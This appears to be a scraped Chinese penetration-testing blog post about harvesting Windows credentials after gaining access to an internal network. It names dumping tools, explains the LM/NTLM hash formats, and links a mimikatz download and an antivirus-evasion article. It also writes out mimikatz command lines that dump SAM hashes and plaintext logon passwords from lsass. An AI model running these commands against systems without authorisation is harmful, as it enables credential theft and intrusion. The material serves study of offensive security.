当前位置:网站首页>内网渗透之内网信息收集(五)
内网渗透之内网信息收集(五)
2022-07-06 09:22:00 【不知名白帽】
凭证信息收集
01凭证获取工具
常用来获取windows密码的工具
- mimikatz
- wce
- pwddump7
- ophcrack
- procdump+mimikatz
- lazagne
02密码hash
LM哈希&NTLM型哈希
winodws hash:
2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | |
LM | √ | √ | √ | ||||
NTLM | √ | √ | √ | √ | √ | √ | √ |
windows本地hash:
http://www.secpulse.com/archives/65256.html
windows系统下hash密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
03mimikatz
mimikatz下载:
链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg
提取码:jryu
非本地交互式凭证获取
mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"
一般都是通过远程登陆靶机,在靶机内下载mimikatz
log result.txt(将结果传到txt中)
privilege::debug(提权)
token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)
获取到system用户的token
lsadump::sam(获得用户哈希)
sekurlsa::logonpasswords(获取明文密码)
mimikatz1.x版本:
privilege::debug //提升权限
inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里
@getLogonPasswords //获取密码
mimikatz免杀:
https://www.freebuf.com/articles/system/234365.html
04get-hashs
边栏推荐
- 2. First knowledge of C language (2)
- MATLAB打开.m文件乱码解决办法
- 7-11 mechanic mustadio (PTA program design)
- [au cours de l'entrevue] - Comment expliquer le mécanisme de transmission fiable de TCP
- Harmonyos JS demo application development
- [hand tearing code] single case mode and producer / consumer mode
- Poker game program - man machine confrontation
- 实验八 异常处理
- 深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
- Attach the simplified sample database to the SQLSERVER database instance
猜你喜欢
小程序web抓包-fiddler
使用Spacedesk实现局域网内任意设备作为电脑拓展屏
SRC挖掘思路及方法
实验六 继承和多态
Matlab opens M file garbled solution
Package bedding of components
附加简化版示例数据库到SqlServer数据库实例中
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
随机推荐
Hackmyvm target series (3) -visions
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
1. Preliminary exercises of C language (1)
实验七 常用类的使用(修正帖)
Experiment 4 array
HackMyvm靶机系列(1)-webmaster
[MySQL table structure and integrity constraint modification (Alter)]
Difference and understanding between detected and non detected anomalies
记一次猫舍由外到内的渗透撞库操作提取-flag
【VMware异常问题】问题分析&解决办法
7-11 mechanic mustadio (PTA program design)
7-1 output all primes between 2 and n (PTA programming)
Hackmyvm target series (4) -vulny
[MySQL database learning]
Package bedding of components
1. First knowledge of C language (1)
7-4 散列表查找(PTA程序设计)
SRC mining ideas and methods
强化學習基礎記錄
7-11 机工士姆斯塔迪奥(PTA程序设计)